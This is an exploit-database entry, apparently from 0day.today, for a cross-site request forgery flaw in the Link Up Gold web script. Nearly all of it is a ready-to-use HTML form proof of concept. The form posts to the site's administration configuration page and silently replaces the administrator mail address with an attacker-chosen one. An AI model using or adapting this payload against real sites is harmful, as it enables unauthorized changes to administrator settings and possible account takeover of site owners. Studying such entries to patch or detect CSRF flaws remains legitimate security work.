id: 17871
date: 03/29/2012
title: Link Up Gold CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: Link Up Gold CSRF
# Author: Jonturk75
# Category::  webapps
# Demo : http://demo.scripts-gate.com/LinkUpGold/administration
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form method="POST" action="target.com/administration/[PATH]/configuration_main.php">
<input class="field10" size="70" name="mail" value="mail@mail.com" type="hidden">
<input name="submit" value="Save" class="button10" type="submit">
</form>



#  0day.today [2023-03-24]  #